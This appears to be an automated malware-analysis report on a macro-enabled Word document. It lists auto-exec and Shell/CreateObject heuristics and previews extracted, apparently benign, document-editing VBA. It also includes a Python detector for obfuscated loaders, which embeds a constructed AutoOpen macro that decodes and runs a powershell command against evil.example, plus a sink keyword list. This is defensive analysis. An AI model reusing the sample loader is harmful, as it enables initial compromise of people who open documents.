Verdict: MALICIOUS
Risk Score: 350

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is an OOXML (Word) document whose VBA project contains multiple macros, including the auto-executing entry points AutoOpen, Document_Open and Auto_Close. The critical heuristics are a Shell() call and an obfuscated auto-exec loader that rebuilds strings at run time before passing them to a COM-instantiation or execution sink; CreateObject and Environ() calls are also present. Together these match the macro-loader shape used for initial compromise: a spearphished document whose macros decode and run a second-stage command. Note that the preview below shows only UserForm event handlers for a document-editing utility (page-number fields, reference insertion, copy between two open documents); the Shell()/CreateObject sinks and the decoder routine lie elsewhere in the 2.6 MB of extracted source, so review the full macros.bas before treating this as a confirmed downloader.
Heuristics (10)

- VBA project inside OOXML [medium] OOXML_VBA (8 related findings): Document contains a VBA project; VBA macros present.
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA.
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace() removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source, so a plain grep of the extracted source for those names will miss them.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro.
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro.
- Auto_Close macro [high] OLE_VBA_AUTOCLOSE: Auto_Close macro.
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call.
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON: Environ() call (env variable access).
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.allapi.net/ (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

  The schemas.openxmlformats.org and schemas.microsoft.com entries are XML namespace URIs declared in the package parts of every Word document and are not network indicators. http://www.allapi.net/ is the only non-namespace URL, and the tool attributes it to the document text rather than to macro code.
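A worked version of the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER check, as an added example that is not the analyzer's or oletools' own code: it rebuilds the three decoder shapes the heuristic names (numeric Chr() array, hex string, junk-token Replace()) from a constructed macro and reports which execution sinks only become visible after decoding. The SAMPLE_VBA text, the AUTOEXEC and SINKS lists and the severity ladder are the example's own assumptions, not taken from the report or from the analyzed document; it works on decompressed VBA source and does not cover the compiled-stream case handled by OLE_VBA_PCODE_AUTOEXEC_EXEC.

```python
"""Static check for obfuscated auto-exec VBA loaders (added example, not the
analyzer's or oletools' code).  Mirrors the shape of the
OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic on a constructed macro: strings
hidden as Chr() number arrays, hex strings and junk-token Replace() calls are
rebuilt and then checked for sinks the visible source never names."""
import re

# Auto-execution entry points for Word and Excel VBA.
AUTOEXEC = {"AutoOpen", "AutoClose", "AutoExec", "Document_Open",
            "Document_Close", "Auto_Open", "Auto_Close", "Workbook_Open"}

# Substrings that mark a COM-instantiation, execution or download sink.
SINKS = ("CreateObject", "WScript.Shell", "Shell", "powershell", "cmd.exe",
         "cmd /c", "MSXML2.XMLHTTP", "ADODB.Stream", "http://", "https://")

# Constructed loader (assumption: not taken from the analyzed document).  Only
# CreateObject is visible; WScript.Shell, powershell and the URL are decoded.
SAMPLE_VBA = r'''
Function Hx(t As String) As String
    Dim i As Long, r As String
    For i = 1 To Len(t) Step 2
        r = r & Chr(CLng("&H" & Mid(t, i, 2)))
    Next
    Hx = r
End Function

Sub AutoOpen()
    Dim a, s As String, i As Long
    a = Array(87, 83, 99, 114, 105, 112, 116, 46, 83, 104, 101, 108, 108)
    For i = 0 To UBound(a)
        s = s & Chr(a(i))
    Next
    h = "706f7765727368656c6c"
    j = Replace("h@@t@@tp://@@ev@@il.example/@@p.ps1", "@@", "")
    Set o = CreateObject(s)
    o.Run Hx(h) & " -nop -c " & j
End Sub
'''


def _printable(s):
    return bool(s) and all(32 <= ord(c) < 127 for c in s)


def decode_char_arrays(src):
    """Array(87, 83, ...) literals whose bytes form printable ASCII."""
    out = []
    for body in re.findall(r"\bArray\(\s*([0-9][0-9\s,]*)\)", src):
        nums = [int(n) for n in body.replace(",", " ").split()]
        s = "".join(chr(n) for n in nums if n < 256)
        if len(s) == len(nums) and _printable(s):
            out.append(s)
    return out


def decode_hex_strings(src):
    """Quoted even-length hex strings of 8+ digits that decode to text."""
    out = []
    for h in re.findall(r'"([0-9A-Fa-f]{8,})"', src):
        if len(h) % 2 == 0:
            s = bytes.fromhex(h).decode("latin-1")
            if _printable(s):
                out.append(s)
    return out


def decode_replace_junk(src):
    """Replace("a@@b", "@@", "") -> "ab": junk-token removal."""
    pat = r'Replace\(\s*"([^"]*)"\s*,\s*"([^"]+)"\s*,\s*""\s*\)'
    return [lit.replace(junk, "") for lit, junk in re.findall(pat, src)]


def autoexec_procs(src):
    pat = r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\("
    return sorted(set(re.findall(pat, src, re.M)) & AUTOEXEC)


def sinks_in(text):
    t = text.lower()
    return {s for s in SINKS if s.lower() in t}


def analyze(src):
    """Return the loader indicators and a severity on the report's own scale."""
    decoded = (decode_char_arrays(src) + decode_hex_strings(src)
               + decode_replace_junk(src))
    visible = sinks_in(src)
    hidden = sinks_in("\n".join(decoded)) - visible
    auto = autoexec_procs(src)
    if auto and hidden:        # auto-exec entry plus sinks seen only after decoding
        severity = "critical"
    elif auto and visible:
        severity = "high"
    elif decoded or visible:
        severity = "medium"
    else:
        severity = "info"
    return {"autoexec": auto, "decoded": decoded, "visible_sinks": visible,
            "hidden_sinks": hidden, "severity": severity}


if __name__ == "__main__":
    for key, val in analyze(SAMPLE_VBA).items():
        print(f"{key}: {val}")
```

Run it as a script to see the indicators for the embedded sample. For a real document, feed it the decompressed source produced by olevba (whose `--deobf` option performs a comparable string reconstruction) rather than the raw vbaProject.bin: the checker reads source text, not p-code.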
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2662308 bytes (about 2.5 MiB) | cbc65b8879ee1632967909cf0784d8ef6856ffa73c4590581eac9dcaf27c372a |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ChkPage"
Attribute VB_Base = "0{DA289408-08F0-4E1F-AFBE-FEBA38DC9DAD}{6706B64B-CF8C-437F-849D-B6FF3E0BC081}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
'Application.Run MacroName:="مراجعةأرقام_صفحات_الفهارس"
Ch = 1
ChkPage.HIDE
End Sub
Private Sub CommandButton2_Click()
Ch = 2
ChkPage.HIDE
'Application.Run MacroName:="مراجعةأرقام_صفحات_الفهارس2"
End Sub
Private Sub CommandButton4_Click()
End
End Sub
Attribute VB_Name = "copy"
Attribute VB_Base = "0{BF7978E8-492C-4461-981A-9DD48322620A}{9F5534B8-8D8A-485E-B9B8-98808E3FB30D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CheckBox3_Click()
If CheckBox3 = True Then fn2 = 2
If CheckBox3 = False Then fn2 = 0
End Sub
Private Sub CommandButton1_Click()
sors = Selection
Selection.copy
If fn2 = 2 Then
Selection.MoveRight Unit:=wdCharacter, Count:=1
Selection.MoveLeft Unit:=wdCharacter, Count:=1
'Selection.TypeText Text:=" "
'Selection.MoveLeft Unit:=wdCharacter, Count:=1
Selection.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
"PAGE \* Arabic ", PreserveFormatting:=True
Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdExtend
'Selection.MoveLeft Unit:=wdCharacter, Count:=2, Extend:=wdExtend
'Selection.Fields.Unlink
Pg = Selection
Selection.Delete Unit:=wdCharacter, Count:=1
End If
Nc = Nc + 1
mysource2.Activate
Selection.TypeText Text:=sors
Selection.Find.Execute FindText:=sors, Forward:=False, Wrap:=wdFindStop
Selection.MoveRight Unit:=wdCharacter, Count:=1
Selection.TypeText Text:=" " + Pg
'Selection.Paste
Selection.RtlRun
'Selection.TypeText Text:=vbTab + pg
Selection.TypeParagraph
Selection.WholeStory
Selection.copy
Selection.EndKey Unit:=wdStory
mysource1.Activate
End Sub
Private Sub CommandButton2_Click()
mysource2.Activate
Selection.WholeStory
Selection.copy
mysource1.Activate
Selection.Paste
'Selection = ""
'mysource2.Close SaveChanges:=wdDoNotSaveChanges
End Sub
Private Sub CommandButton3_Click()
On Error Resume Next
Selection = ""
mysource2.Close SaveChanges:=wdDoNotSaveChanges
End
End Sub
Private Sub CommandButton4_Click()
mysource2.Close SaveChanges:=wdDoNotSaveChanges
End
End Sub
Attribute VB_Name = "FrmRef1"
Attribute VB_Base = "0{0D4B8977-1804-4631-83CA-5BE6C2465BC6}{C409C76F-3123-4C7A-B95C-C651C58A5063}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Dim FileLoaded As Boolean
Dim OldKey As String
Dim Ref As Collection
Private Sub CommandButton1_Click()
Open "c:\saudmac2007-13\Obt\FrmRef1TrueOrFalse.txt" For Output As #9
Write #9, "FrmRef1"
Write #9, FrmRef1.CheckBox5.Value
Write #9, FrmRef1.CBHash.Value
Write #9, FrmRef1.CheckBox4.Value
Close (9)
End
End Sub
Private Sub CommandButton2_Click()
Dim Sp
If Hash = 1 Then
End If
If FrmRef1.CheckBox5 = False Then Sp = " "
If FrmRef1.CBHash = True Then
Selection.TypeText Text:="<"
End If
If FrmRef1.CheckBox5 = True Then
Selection.TypeText Text:="+["
End If
Selection.Text = ListResult.Text & Sp
Selection.MoveRight Unit:=wdCharacter, Count:=1
If FrmRef1.CheckBox5 = True Then
Selection.TypeText Text:="]"
End If
If FrmRef1.CBHash = True Then
Selection.TypeText Text:=">"
End If
End Sub
Private Sub ListResult_Click()
Me.Caption = ListResult.Text
```

... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 7399424 bytes (about 7.1 MiB) | 7956da48d494cde8e35879e07162d5db971363781ce86a4fb39f08fd49e9b51b |